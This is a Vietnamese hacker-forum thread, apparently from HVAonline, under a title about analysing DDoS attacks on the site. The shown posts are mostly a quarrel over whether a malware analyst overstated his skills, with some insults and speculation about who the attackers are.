Phân tích tính chất vài trận DDoS HVA vừa qua.

explorer88 — GMT

- Rõ ràng, ai cũng hiểu được nếu không có dẫn chứng trên đó thì có thể tôi không cho vào… Vì sự thật đúng là như vậy đó, tôi chả mất công sức và thời gian đâu để dò tìm lại từng bài post của TQN làm gì cả, điều này TQN là người hiểu rõ nhất… dân làm việc trong lĩnh vực IT Việt Nam chạy đua theo cái “ngọn” của ngành công nghệ mà, phải không ??? Trên thế giới phát triển ra sản phầm phần cứng dựa trên khoa học cơ bản rồi, để rồi dân ta đua nhau cày cày phát triển ứng dụng trên đó !? Lulec thì tôi không biết thành viên, tuy nhiên tôi dám so sánh Anonymoust và “TQN - ở diễn đàn hva này” thì tôi phải dám chắc trình độ của họ hơn, và tôi cũng biết thành viên của họ có người đang làm trong lĩnh vực nghiên cứu đa lõi trong sản phẩm ở Intel, Micro… Trans. Chứ không chỉ dừng lại ở việc tìm hiểu bộ vi xử lý, coding,… trong lĩnh vực RCE thậm chí lớn hơn nữa là “RE” vậy.

Hơ, tôi cũng thường xuyên xem topic này nhưng tôi chưa thấy anh TQN nói anh ấy trên tài Anonymous hay Lul gì cả. Bạn này nói "không có dẫn chứng trên đó thì có thể tôi không cho vào" Thế tôi hỏi lại là dẫn chứng đó ở đâu ? Nếu dẫn chứng đó không tìm thấy trong page này thì hãy đưa liên kết ra đây. Đừng có ở đó mà phán nhảm rồi nói như đã chứng minh được điều gì đó rồi.

- Bên trên tôi có nói nguyên văn như sau “Tôi thấy nên đổi tên luồng bài này thành "Phân tích kĩ thuật vài trận DDoS HVA vừa qua." thì hợp lý hơn, chứ nếu để là "Phân tích tính chất vài trận DDoS HVA vừa qua." thì ít nhiều cũng có phân tích, bóc tách vì sao họ tấn công hvaonline !? Do sở thích chăng ? Rõ ràng là ai cũng biết mà” . Tôi còn sử dụng dấu “chấm hỏi” kìa… Những bạn nào đọc bài viết đó của tôi cũng có thể hiểu được ý tôi suy nghĩ rằng “họ không phải là do sở thích mà làm”

Việc stl là ai, động cơ thật sự là gì thì vẫn còn đang được tranh luận vì chưa đủ cơ sở kết luận. Ở trước page này vài page có đôi câu tranh luận giữa anh Conmale và bác Mai rồi đấy. Tìm đọc đi. Nếu hỏi thì cứ hỏi thẳng việc gì phải hỏi úp mở thế để dễ bề ngụy biện sau này à ?

- Không “vẽ đường cho hươu chạy” thì làm sao có yếu tố kĩ thuật để mạt sát, chửi bới… tùm lum trong diễn đàn vậy. Chưa xét về yếu tố mục đích của họ là gì , chỉ xét về mặt kĩ thuật thôi đi… cho dù có là người đi trước, hay giỏi hơn người ta mấy mươi lần đi chăng nữa. Tôi đâu có phản đối việc TQN đã từng đưa ra 2 chủ đề phân tích kĩ thuật VX của STL, phải không ??? Nhưng dựa vào đó để mà đánh giá các vấn đề khác… không phải là khiến cho người ta muốn “ọe” hay sao ???

Hờ, stl họ có giỏi cỡ nào thì việc làm của họ có tương xứng hay không? Không thể chỉ xét riêng lĩnh vực kỹ thuật ở đây được vì những hành vi xấu xa của họ đều dựa trên những kỹ thuật để thực hiện. Kể cả họ là tiền bối lớn tuổi hơn nhưng họ làm nhiều việc xấu thì họ phải bị chửi. Họ dựa trên kỹ thuật để làm việc xấu thì họ phải bị chửi. Sao bạn s3ll có vẻ xấu hổ và tức giận thay cho họ thế ? Thành viên HVA chửi là chửi có đích nhắm hẳn hoi là stl đó chứ không chửi bừa chửi phứa ai đâu.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

s3ll wrote:

Có 2 bạn là nhân viên của CMCInfosec và nhân viên của BKAV tranh cãi nhau về các biến thể của mẫu "GoogleCrashHandle", người của CMC thì nói nó đúng là mẫu đã thực hiện DDoS vào vietnamnet.vn , còn người của BKAV lúc đó lại phủ nhận điều này, trong khi các thành viên của diễn đàn đó phải yêu cầu nhân viên của CMCInfoSec đưa ra mẫu, rùi bằng chứng... thì họ mới tin... Tôi nghĩ rằng lúc đó CMC có mãu và phân tích, chứ chưa có đủ yếu tố kĩ thuật để khẳng định 100% rằng đó chính là mẫu đã tấn công vào vietnamnet.vn. Xin lỗi các thành viên của diễn đàn một lần nữa nha. Cảm ơn!

Việc nghĩ của bạn là sai rồi, CMC InfoSec hoàn toàn có đủ chứng cứ và phân tích kỹ thuật cụ thể. Đồng thời, diễn đàn VirusVN không là gì để tôi phải gửi một mẫu virus lên cả ;) , tôi cũng không có trách nhiệm cũng như quyền để leak mẫu virus đi lung tung như một kẻ vô trách nhiệm. Người nào không có đủ thông tin, muốn xin xỏ mà còn xin xỏ kiểu ông trời thì tôi mặc kệ đấy. Việc này tôi đã ghi rõ ở diễn đàn VirusVN nhưng hình như có một số người vẫn cố tình không chịu đọc hiểu ;-) .

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

s3ll wrote:

@Conmale và TMDTHBC : Có vẻ sở thích “quy kết” nhỉ. Nào là “nhét chữ vô miệng” hay là “ngụy biện”, “quy chụp”… gì gì đó nữa ?
Conmale wrote:

Đoạn bồ quote ở trên từ bài của TQN chẳng có chỗ nào nói là TQN khẳng định trên tầm anonymost và lulzec hết. Trên diễn đàn này TQN cũng chưa hề "khẳng định" mình trên tầm ai hết (ngoài chuyện trên tầm stl). Đừng chơi trò nhét chữ vô miệng người khác một cách hồ đồ như vậy. Nhét chữ vô miệng người khác rồi tự kết luận xứng hay không xứng chính là trò nguỵ biện.
- Rõ ràng, ai cũng hiểu được nếu không có dẫn chứng trên đó thì có thể tôi không cho vào… Vì sự thật đúng là như vậy đó, tôi chả mất công sức và thời gian đâu để dò tìm lại từng bài post của TQN làm gì cả, điều này TQN là người hiểu rõ nhất… dân làm việc trong lĩnh vực IT Việt Nam chạy đua theo cái “ngọn” của ngành công nghệ mà, phải không ??? Trên thế giới phát triển ra sản phầm phần cứng dựa trên khoa học cơ bản rồi, để rồi dân ta đua nhau cày cày phát triển ứng dụng trên đó !? Lulec thì tôi không biết thành viên, tuy nhiên tôi dám so sánh Anonymoust và “TQN - ở diễn đàn hva này” thì tôi phải dám chắc trình độ của họ hơn, và tôi cũng biết thành viên của họ có người đang làm trong lĩnh vực nghiên cứu đa lõi trong sản phẩm ở Intel, Micro… Trans. Chứ không chỉ dừng lại ở việc tìm hiểu bộ vi xử lý, coding,… trong lĩnh vực RCE thậm chí lớn hơn nữa là “RE” vậy. Đó là lý do tôi đánh giá cao anonymoust hơn đó anh Conmale à !

Thảy ra bằng chứng đi bồ. Nói khơi khơi mà không có bằng chứng thì chẳng có giá trị nào hết. Chỗ nào TQN "khẳng định" rằng cậu ấy "trên tầm" ai? Đưa ra đi, đừng nói chuyện "chả mất công sức", nếu không, bồ dính vô chỗ mạ li thành viên vô căn cứ đó. Từ chỗ chụp mũ TQN, bồ nhảy tới chỗ đôi chối chuyện ai làm cái gì trong lĩnh vực gì rồi đánh giá ai hơn ai thì cũng vô ích và hoàn toàn lạc đề. Đừng có chụp cho TQN cái mũ khinh người hoặc tự cao để hạ thấp TQN (ngang tầm với stl) vì chiêu này cũ kỹ quá rồi. Miễn giùm cho.

s3ll wrote:

Conmale wrote:

Bồ còn có trò nguỵ biện khác là thay mặt "người ta" để "oẹ". Bồ muốn "oẹ" thì bồ cứ việc nhưng đừng "oẹ" giùm người khác. Cái trò tự đại diện đám đông là cái trò ăn vô trong máu rồi phải không? Từ khi bồ đăng ký nick trên HVA này, bồ đã viết những gì? Zero! Bồ đã dùng được một tí kỹ thuật nào để phản bác? Zero! Vậy bồ lấy tư cách gì để "oẹ"? Nếu bồ cho rằng việc tấn công HVA là "do sở thích" thì việc tấn công vietnamnet là do đâu? Thật khôi hài khi thấy một đám người bỏ hàng đồng tiền bạc, thời gian, nhân lực ra để chơi trò "do sở thích" và cả một đất nước có cả mấy trăm đầu báo cũng im như thóc. Nếu bồ cho rằng việc tấn công HVA là "do sở thích" thì việc tấn công vietnamnet là do đâu? Thật khôi hài khi thấy một đám người bỏ hàng đồng tiền bạc, thời gian, nhân lực ra để chơi trò "do sở thích" và cả một đất nước có cả mấy trăm đầu báo cũng im như thóc. Hôm qua tớ nhận được mail từ dịch vụ hosting bên Đức. Họ cho biết họ sẽ hỗ trợ chống DDoS miễn phí cho server của HVA và sẽ làm việc trực tiếp với những nhà chức trách để dẹp bỏ nguồn DDoS này. Tớ chỉ phì cười một mình và gởi mail cám ơn họ. Nghĩ lại thì thấy chua chát. Ngay cả một đám hosting thương mại còn phản ứng vì một khách hàng bé nhỏ như HVA vậy mà bao nhiêu cơ quan ngôn luận, bao nhiêu cơ quan hữu trách của một quốc gia thì....tịt. Đúng là "tự do và văn minh" đến độ ai muốn làm "do sở thích" thì làm.
- Tôi nói “ọe” giùm người khác bao giờ vậy admin “Conmale” ??? Mà đằng ấy muốn tôi đưa ra kĩ thuật để “phản bác” cái gì cơ chứ ??? Bên trên tôi có nói nguyên văn như sau “Tôi thấy nên đổi tên luồng bài này thành "Phân tích kĩ thuật vài trận DDoS HVA vừa qua." thì hợp lý hơn, chứ nếu để là "Phân tích tính chất vài trận DDoS HVA vừa qua." thì ít nhiều cũng có phân tích, bóc tách vì sao họ tấn công hvaonline !? Do sở thích chăng ? Rõ ràng là ai cũng biết mà” . Tôi còn sử dụng dấu “chấm hỏi” kìa… Những bạn nào đọc bài viết đó của tôi cũng có thể hiểu được ý tôi suy nghĩ rằng “họ không phải là do sở thích mà làm”, nên bồ Conmale đừng có dựa vào cái cụm từ đó để mà suy diễn ra này nọ nha. Một con người mà “chi li”, để ý đến từng câu, từng chữ của người khác mà lại có thể đánh giá như vậy sao ??? Thật khiến cho người ta buồn cười quá mà.

Nếu vậy, bồ là "người ta" hả? Tôi nói bồ nên phân tích kỹ thuật có nghĩa là bồ nên dùng kiến thức kỹ thuật để sửa lưng TQN thay vì chụp cái mũ vô cớ cho TQN rồi trây trúa ra. Nếu bồ không có khả năng kỹ thuật hay bồ muốn chơi trò úp úp mở mở thì xin miễn cho. Bồ dùng dấu chấm hỏi để rồi bồ phang thêm 1 câu "rõ ràng là ai cũng biết mà" thì hỏi để làm chi? Đây là trò tròng tréo câu chữ, nguỵ biện ý tứ chớ chẳng có thiện ý gì trong này hết.

s3ll wrote:

Conmale wrote:

Nếu TQN phân tích và phê bình sai thì hãy dùng kỹ thuật mà chỉnh TQN một mẻ. Đừng có chuyển hệ sang chỗ phê bình TQN vì TQN phê bình những lỗi quá sơ đẳng của stl. Đúng ra là phải cám ơn TQN vì chính những phê bình ấy chính là "vẽ đường cho hưu chạy" mà sao còn trách TQN? TQN phân tích thì quá nhiều rồi, bồ thấy chưa đủ hay sao mà còn đòi "cứ phân tích đi"? Trong suốt chủ đề này và một số chủ đề khác, TQN đã phân tích và có đủ thẩm quyền để chửi. Không những chửi những thứ buồn cười, những tiểu xảo ngớ ngẩn mà còn chửi những trò đồi bại của những sản phẩm mà stl tạo ra.
- Không “vẽ đường cho hươu chạy” thì làm sao có yếu tố kĩ thuật để mạt sát, chửi bới… tùm lum trong diễn đàn vậy. Chưa xét về yếu tố mục đích của họ là gì , chỉ xét về mặt kĩ thuật thôi đi… cho dù có là người đi trước, hay giỏi hơn người ta mấy mươi lần đi chăng nữa. Tôi đâu có phản đối việc TQN đã từng đưa ra 2 chủ đề phân tích kĩ thuật VX của STL, phải không ??? Nhưng dựa vào đó để mà đánh giá các vấn đề khác… không phải là khiến cho người ta muốn “ọe” hay sao ???

Hì hì.... ý bồ là cứ việc vẽ đường cho stl chạy nhưng đừng chửi stl, nếu không, bồ sẽ thay mặt stl để vô đây mà phản ứng? :-) . Bồ ranh nhưng chưa.... ma đủ để dùng cái vỏ che chắn cho mình đâu bồ à. Giấu đầu lòi đuôi rồi. PS: dạo này thương hiệu stl bị chửi quá nên dẹp quách nó rồi. Chuẩn bị tiếp thị nhãn hiệu khác phải không nào? :-) . Mấy bạn stl cứ nghĩ mình vẫn còn "bí ẩn" như ngày nào. Cái mặt nạ đã rớt lả tả xuống đất nên vội vàng chụp cái mặt nạ khác lên.

Phân tích tính chất vài trận DDoS HVA vừa qua.

trycatch — GMT

Bạn s3ll giỏi quá, kinh doanh đồ trang sức mà ngâm cứu thông tin trên các diễn đàn về virus kỹ quá. Xem ra bạn và anh TQN(trading vàng, :D) cùng nghề rồi, chỉ khác sàn giao dịch thôi. Bạn s3ll nên tập trung chuyên môn kinh doanh đồ trang sức thì hay hơn là bạn 'nhét chữ vào mồm' người khác.

Phân tích tính chất vài trận DDoS HVA vừa qua.

cadaochoem — GMT

theo em thì anh conmale không nên tranh luận nữa, mất thời gian quý báu, cả diễn đàn này đều hiểu tính anh conmale, và cả TQN cũng như nhiều thành viên gạo cội khác nữa. Cứ tập trung vào kỹ thuật, topic này không nên loãng đi vì những reply của s3ll hay là sell

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

Thiệt dở hơi, không biết bạn s3ll gì gì đó có bức xúc cho ai đó không.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC — GMT

- Tôi kinh doanh đồ trang sức, .. vả lại cũng không phải là người chuyên đi “nói nhăng, nói cuội” hay là “trầm cảm” như đằng ấy suy diễn đâu nha. Bị trầm cảm thì đâu có đi tụ tập, nói chuyện trên trời dưới biển với anh em, bạn bè tôi được… bị Trầm cảm thì đâu có cái cảm giác NÓNG QUÁ … như vậy được… phải không TMDTHBC ??? Tôi “phủ nhận việc làm của người khác” chỗ nào vậy bạn TMDTHBC ??? .. thế nên không dám để bạn TMDTHBC phải mất công “RE” đâu, “RCE” thì đủ rồi, trong quá trình tìm hiểu IT cũng có viết mấy code phần mềm làm việc cá nhân, nếu bạn TMDTHBC có nhã hứng thì tôi gửi cho bạn RCE để mà hiểu tôi hơn cũng được. Tôi “xin lỗi” vì bài viết này của tôi bị lạc đề, nó đang trong một luồng bài “phân tích” ??? bạn TMDTHBC hiểu không ??? @ s3ll: :D mình chỉ là 1 anh lính quèn trong quân chủng radar tên lửa trực thuộc quân khu thôi. Cũng chưa đủ trình độ RCE như các member HVA nhưng việc họ làm --> HVA và các member trong diễn đàng khiến lính quèn chúng tôi cảm mến. Về IT thì mình không rành lắm nhưng nếu bạn có nhã ý thì cứ up lên rồi mình sẽ tranh thủ thời gian để học thêm ... ( :-) mỗi ngày mình track radar đến 10 h lận, nên "RCE" chắc hơi lâu mong s3ll thông cảm nhé. Mình thì không suy diễn tí nào cả "lính mà": 'tìm-thấy-track-toạ độ-tốc độ' ---> missile "lên ngay". bạn hiểu không? Mình ủng hộ HVA làm vì tình yêu IT, vì ... "mình không cần phải nói". Giọng điệu của bạn cứ như là 1 anh chàng stl hay 1 thằng "... khựa" nào đó bực bội nên nói cho nguôi ngoai nên mình mới có ý kiến. Bạn hiểu chưa s3ll. @member HVA mình theo diễn đàn này để có thêm kiến thức & ứng dụng thêm thôi. Mong mọi người thông cảm. Còn việc đá mấy "khựa" ok mình ủng hộ hai tay hai chân, nếu cần thì ... cả đại đội mình sẽ đến. (hihi lúc này 1 ngày trực đến 10h nên oải quá)

Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 — GMT

s3ll wrote:

- Không “vẽ đường cho hươu chạy” thì làm sao có yếu tố kĩ thuật để mạt sát, chửi bới… tùm lum trong diễn đàn vậy. Chưa xét về yếu tố mục đích của họ là gì , chỉ xét về mặt kĩ thuật thôi đi… cho dù có là người đi trước, hay giỏi hơn người ta mấy mươi lần đi chăng nữa. Tôi đâu có phản đối việc TQN đã từng đưa ra 2 chủ đề phân tích kĩ thuật VX của STL, phải không ??? Nhưng dựa vào đó để mà đánh giá các vấn đề khác… không phải là khiến cho người ta muốn “ọe” hay sao ???

Miệng bác là cái gì của người ta mà lại đi "oẹ" hộ thế. Tởm quá đê. Mà ở trên thanh minh kêu không làm, dưới lại làm ngay được, thiệt là bái phục. Btw, đúng là anh TQN có nhắc tới Anonymous và Lulzsec nhưng ý của anh TQN không phải là ảnh trên tài họ. Làm sao lại đi so sánh một cá nhân với một tập thể được nhỉ ?. Mà cậu s3ll cứ làm như tất cả mem của Anonymous đều làm cho Intel với Micro ..., ai cũng là cá nhân kiệt suất không bằng. Vài anh em ở HVA đây, một số cũng tài năng và kiến thức có lẽ cũng phải hơn trăm thằng trong Anonymous hay Lulz :))

Phân tích tính chất vài trận DDoS HVA vừa qua.

ga_cum06 — GMT

đọc thấy buồn cười : bạn sell này mới có 3 bài post trên hva mới đăng kí ngày 10/08/2011 vậy mà vào topic này để phát ngôn với ngụ ý gây diễn biến hoà bình trong mem hva chăng? Chắc bạn biết câu "Chó cứ sủa và đoàn người cứ đi" chứ ? cách bạn đặt nick làm cho m thấy có vẻ bạn thuộc thế hệ 9x. cũng có đủ các tính cách bồng bột cay cú của STL? bạn là ai, bạn như thế nào, bạn đã truy cập vào hva bao nhiêu lần từ ip đó chắc admin biết dễ dàng thôi mà. Nếu bạn là ng dùng bt thì chắc ip của bạn chả mấy khi thay đổi đâu nhỉ.nhiều cái sẽ đc tìm ra thôi! mà m thấy bạn so sánh cũng thể hiện độ nguy hiểm của bạn : TQN và a ni mao hay lulsecz,. mang 2 khái niệm về 2 kiểu người khác nhau để so sánh với nhau quả là buồn cười :))1 bên là 1 nhóm (có lẽ bạn ko nguy hiểm đến mức độ ko biết điều này) 1 bên là 1 người. 1 bên là hacker làm điều k hay , 1 bên là người RCE để bảo vệ lẽ phải.và thêm 1 điều này nữa nhé : dù cho lulsecz hay a ni mao hay ai đi chăng nữa vào hva cũng k được sự tôn trọng của đa phần các mem = TQN đâu....đọc xong rồi tự hiểu về độ nguy hiểm của mình nhé :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

GhoZt — GMT

s3ll wrote:

- Tôi kinh doanh đồ trang sức, .. vả lại cũng không phải là người chuyên đi “nói nhăng, nói cuội” hay là “trầm cảm” như đằng ấy suy diễn đâu nha. Bị trầm cảm thì đâu có đi tụ tập, nói chuyện trên trời dưới biển với anh em, bạn bè tôi được… bị Trầm cảm thì đâu có cái cảm giác NÓNG QUÁ … như vậy được… phải không TMDTHBC ??? Tôi “phủ nhận việc làm của người khác” chỗ nào vậy bạn TMDTHBC ??? .. thế nên không dám để bạn TMDTHBC phải mất công “RE” đâu, “RCE” thì đủ rồi, trong quá trình tìm hiểu IT cũng có viết mấy code phần mềm làm việc cá nhân, nếu bạn TMDTHBC có nhã hứng thì tôi gửi cho bạn RCE để mà hiểu tôi hơn cũng được. Tôi “xin lỗi” vì bài viết này của tôi bị lạc đề, nó đang trong một luồng bài “phân tích” ??? bạn TMDTHBC hiểu không ???

Cái quái j đây nhỉ ?!! Sao nó viết j đọc ko hiểu !!! Tự biên tự diễn hay sao thế ta ??

Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC — GMT

s3ll wrote:

- Tôi kinh doanh đồ trang sức, .. vả lại cũng không phải là người chuyên đi “nói nhăng, nói cuội” hay là “trầm cảm” như đằng ấy suy diễn đâu nha. Bị trầm cảm thì đâu có đi tụ tập, nói chuyện trên trời dưới biển với anh em, bạn bè tôi được… bị Trầm cảm thì đâu có cái cảm giác NÓNG QUÁ … như vậy được… phải không TMDTHBC ??? Tôi “phủ nhận việc làm của người khác” chỗ nào vậy bạn TMDTHBC ??? .. thế nên không dám để bạn TMDTHBC phải mất công “RE” đâu, “RCE” thì đủ rồi, trong quá trình tìm hiểu IT cũng có viết mấy code phần mềm làm việc cá nhân, nếu bạn TMDTHBC có nhã hứng thì tôi gửi cho bạn RCE để mà hiểu tôi hơn cũng được. Tôi “xin lỗi” vì bài viết này của tôi bị lạc đề, nó đang trong một luồng bài “phân tích” ??? bạn TMDTHBC hiểu không ???

Cái quái j đây nhỉ ?!! Sao nó viết j đọc ko hiểu !!! Tự biên tự diễn hay sao thế ta ?? uhm post sai bạn ơi, sorry nhé. Của bạn s3ll đó mà Be noted: Tôi đã sửa lai cho đúng. Đoạn viết trên là của s3ll, chứ không phải là của TMDTHBC. Ở bài viết kế trên đây, khi "quote" bạn GhoZt đã sơ ý.- (PXMMRF)

Phân tích tính chất vài trận DDoS HVA vừa qua.

stylish_man — GMT

Chà tự nhiên lại có 1 chú bò lạc ở đây @bò lạc (sori nếu bạn không thích):Theo mình thấy trước hết bạn cần xem xét lại cách ăn nói và dùng ngôn ngữ của mình. Bởi với cách tranh luận hiện tài thì bạn đã không được welcome ở đây rồi (chưa nói đến chuyện tranh luận về cái gì). Về đoạn bạn phản bác TQN thì mình không đồng ý. Về mặt kỹ thuật, cá nhân mình rất khâm phục a TQN và một vài thành viên của HVA ( về a TQN có 1 điểm em còn thắc mắc chưa có thời gian để check nên ko post ở đây). Những việc a TQN làm là hoàn toàn đúng đắn, RCE code để phổ biến cách phòng tránh virus cho mọi người, trong quá trình RCE có bình luận (chửi) cũng là chuyện bình thường,riêng vụ mất pass cũng đủ sôi gan rồi phải ko a TQN rồi đến vấn nạn DDoS nữa. Còn việc bạn bảo chuyển đề tài mình thấy cũng "nhảm" (nói nhỏ: Nếu muốn tranh luận về từng câu chữ hay nói triết lý thì phải nói rằng bạn càng vào nhầm chỗ rồi.) Chỉ trừ 1 chỗ bạn nói đúng (mà mọi người lại bảo bạn sai).Bạn nói không có thời gian check thì thôi để mình tìm hộ vậy. Đoạn này ở trang 6 (anh TQN có edit lại nhưng trong đoạn quote của template vẫn còn. Nên mình quote cả lên đây.

template wrote:

TQN wrote:

slt tới bây giờ chưa lòi rà một con "con mèo què" nào cho Linux, Unix. Đúng không mấy anh stl, sự thật mất lòng nhé. Tối nay em sương sương vài ba chai rồi, ngứa mồm lên chữi mấy anh chơi. Mấy anh tức không ? Làm gì được em ? À mà sao mấy anh sao không dùn 1 tool hide IP, cho 1 thằng đăng ký HVA này, lên đây, tự xưng tao là stl nè, đối chất công bằng với anh em HVA ha ? Đã fake IP rồi thì thánh cũng tìm không ra mà ! Tới bây giờ, em cũng rất muốn chat với 1 thành viên trong team mấy anh. Nick YM của em mấy anh thừa biết mà ha ! Sau này, đừng đánh giá ai thấp, nữa mùa nữa nhé, mấy anh stl ! Thật sự, khi mấy anh nói với Hà Vy Thoại là em là thằng RCE nữa mùa, em sôi gan lắm. Mấy anh nên biết là tới bây giờ, em chỉ dùng 40% công lực của em để dò theo mấy anh thôi. Chỉ cần em ngồi lỳ máy 2 tháng trời, bất chấp tất cả, em sẽ mò tới tận ổ mấy anh ! Đố mấy anh: nhiều vụ em đã hack, đã quậy tới giờ, FBI vẫn tìm không ra ! Đố mấy anh là những vụ gì ? Anonymous, Lucifer là trò trẻ con với em !
Nếu có nhà tài trợ nào đó cho anh TQN 2 tháng lương để cơm gạo áo tiền thì hay biết mấy nhĩ. Anh RE có nửa mùa hay không, có anh em Cviet, hva... này biết. Ở Việt Nam này cao thủ nhiều hay ko, giỏi đến mức nào thì tôi không biết. Nhưng với tôi, hiện nay anh đang là số 1 của làng CNTT VN

Nếu anh TQN có nói thế thì mình cũng không bình luận vì ko có điều kiện để check..hic. BTW, chúc HVA luôn vững tay chèo trong cơn sóng gió. Rgrds,

Phân tích tính chất vài trận DDoS HVA vừa qua.

xnohat — GMT

hề hề, anh em mặc kệ ku STL này đi, em nó bị RE dữ quá, bí lối code nên cắn xàm. Hắn thích quy chụp người khác thì ta đương nhiên cũng có quyền nói hắn là STL , sai thì STL sẽ "hắc" ku s3ll kia rồi tự "bạch hoá" để rửa nhục mà, phải hem ? :-)

Phân tích tính chất vài trận DDoS HVA vừa qua.

thuypv — GMT

mylove14129 wrote:

thuypv wrote:

MÌNH DÙNG BẢN KIS 2011 BẢN QUYỀN, CHẮC LÀ KO BỊ STL ĐÂU
chịu khó đọc lại topic này từ đầu đi bạn. KIS , AVG,.. bản quyền hay không bản quyền thực ra cũng chỉ tạo ra sự yên tâm trong tâm lý cho người sử dụng thôi.

Ơ thế mấy thằng kia mua mất tiền mà ko ăn thua hả anh, chán nhỉ, hôm nay em vẫn ko vào được, dù là dùng iphone lướt web cũng ko vào được vietnamnet luôn Em ngại đọc lại các trang các bác đã viết lắm, dài thấy mồ, em lâu lắm mới vào HVA hình như chủ đề này có nói đến vụ mấy ông STL (sờ ti lợn :-) ) gì đó DDos HVA và vietnamnet sao đó, mấy thằng đó rảnh nhỉ, toàn các trang mình thích đọc lại đi phá hoại làm gì chứ Em vào avira download bản dùng thử 30 ngày về rùi mà quyét chả thấy con virus nào, chắc là tai thằng kasperky của em làm việc tốt quá nên hem phát hiện ra thằng ku nào sao ý à mà lạ, máy thằng em ngồi bên vẫn vào vietnamnet được, riêng máy mình thì ko, các thiết bị kèm theo người cũng ko vào được nốt, chán

Phân tích tính chất vài trận DDoS HVA vừa qua.

s3ll — GMT

@All: Tôi là thành viên cũ của HVA, từ thời gian anh TT.Đức (Nay là TGĐ của CMCInfosec) còn làm admin... Nay đẫ chuyển hẳn sang làm kinh doanh, cũng biết "ThangCuAnh" đã lâu rồi và tất nhiên không có thù oán cá nhân gì ở đây cả. Tôi cũng không ủng hộ bất cứ hành động nào của tổ chức nào tấn công HVA này... @All: Tôi cũng không hề phủ nhận công sức TQN và các thành viên giành cho việc phân tích này. Tôi thấy toàn bộ các ý kiến sau đó đều mang các ý kiến trái chiều. Các bạn đọc đi, đọc lại một hồi, rồi quy chụp cho tôi mấy cái mũ này nọ... Các bạn nói những gì tôi nói không phải sự thật, đòi bằng chứng những gì tôi nói.. Đúng ! Có lẽ tôi đã sai khi đưa lên ý kiến cá nhân trong trường hợp này tại thời điểm này. Và tôi cũng đã 3 lần xin lỗi các bạn vì điều đó. Vốn dĩ không định post thêm một bài nào tranh luận thêm... Qua đây, cũng xin cảm ơn "stylish_man" đó là bài post làm tôi cảm thấy "bức xúc" từ lâu về về cách nói chuyện hơi có vẻ kiêu ngạo của TQN... tôi cũng không biết rằng TQN đã sửa lại bài post đó của mình (Có lẽ trong phút chốc anh ta cảm thấy mình nói hơi quá ). Nếu tôi biết rằng anh ta đã sửa lại thì có lẽ tôi không post bài đấu tiên như trên... Các bạn vẫn nói tôi “nhét chữ vô miệng” , vậy đó là bằng chứng đó. Tôi dám chắc rằng, có nhiều bạn trên diễn đàn không theo dõi kĩ hết các bài viết hoặc thông tin mà chỉ là đưa ra những ý kiến "theo chiều gió" như vậy... Có bạn còn nói, STL đó là của người "Trung Quốc" - "tàu khựa" ??? Tôi nhớ không nhầm thì Admin PXMMRF đã từng có một bài viết đánh giá ý kiến này không đúng. Cá nhân tôi cũng đánh giá như vậy. Ít nhất, trên diễn đàn HVA này không có đủ bằng chứng để đưa ra kết luận đó. Vậy bạn trên nói ý tôi bênh vực cho "tàu khựa" là đúng hay không ??? Hay đó chỉ là một sự "quy kết". Tôi không muốn nói gì thêm, xin ban quản trị xoá bỏ toàn bộ các bài viết tính từ bài đầu tiên của tôi cho đến bài viết này. Tôi không muốn tranh luận thêm với các bạn về vấn đề này ở đây nữa. Cảm ơn !

Phân tích tính chất vài trận DDoS HVA vừa qua.

thuypv — GMT

Úi chà chà, các bác tranh luận làm gì, chỉ giúp em cách vào đọc báo đi với, mấy nay toàn đọc mấy trang vớ vẩn chán chết

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Tối nay, tình cờ đọc 2 cái topic này trên blog của McAfee, giật mình, sao giống và trùng hợp thế không biết: 1. http://blogs.mcafee.com/mcafee-labs/10-days-of-rain-in-korea 2. http://blogs.mcafee.com/mcafee-labs/malware-in-recent-korean-ddos-attacks-destroys-systems Mời các bạn đọc kỹ hai topic này, so sánh với các trận DDOS vào HVA, Vietnamnet của chúng ta, thảo luận thấy có điểm gì giống về cách thức, kỹ thuật không ? Theo tôi, security researcher của McAfee còn thiếu 2 bước đầu của dây chuyền lây nhiễm malware, bot !? Và các bạn hảy nhìn kỹ các hình ảnh minh hoạ của reverser của McAfee, dùng IDA, các bạn có thấy cái gì quen quen không ? Chuyện tranh luận với bạn s3ll (sell), tôi không quan tâm. 10 người 11 ý. Không ai cấm ai suy nghĩ, phát biểu theo ý này ý kia được. Tôi cũng như bạn s3ll, lúc chiều đó uống sương sương mấy chai, tối lên mạng chửi bậy vài câu. Sáng ra tỉnh thì edit lại ngay. Tửu nhập ngôn xuất mà, phải không anh em :P

Phân tích tính chất vài trận DDoS HVA vừa qua.

angel-pc — GMT

Hơ, tôi cũng thường xuyên xem topic này nhưng tôi chưa thấy anh TQN nói anh ấy trên tài Anonymous hay Lul gì cả. Bạn này nói "không có dẫn chứng trên đó thì có thể tôi không cho vào" Thế tôi hỏi lại là dẫn chứng đó ở đâu ? Nếu dẫn chứng đó không tìm thấy trong page này thì hãy đưa liên kết ra đây. Đừng có ở đó mà phán nhảm rồi nói như đã chứng minh được điều gì đó rồi.

Mình xác nhận là có đấy bạn. Đây là điều khiến mình thấy không hay ở TQN. Không biết là lần đó TQN có men khi post bài không nhưng thực sự TQN đã khẳng định một điều là: bạn ấy đã từng làm những việc động trời hơn Anonymous mà đến giờ FBI chưa tìm ra hay chưa phát hiện ra Mình không quan tâm TQN và STL làm gì, cái mình quan tâm là kỹ thuật và mình tôn trọng sự thật. Có thể mục đích của TQN là đúng nhưng cách thể hiện cảm xúc không hay cho lắm @TQN: mình rất thích những bài phân tích của bạn, đó là lý do mà ngày nào mình cũng vào HVA từ khi có sự kiện STL này :D @STL: nǐ mén tài hǎo :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

mylove14129 — GMT

TQN wrote:

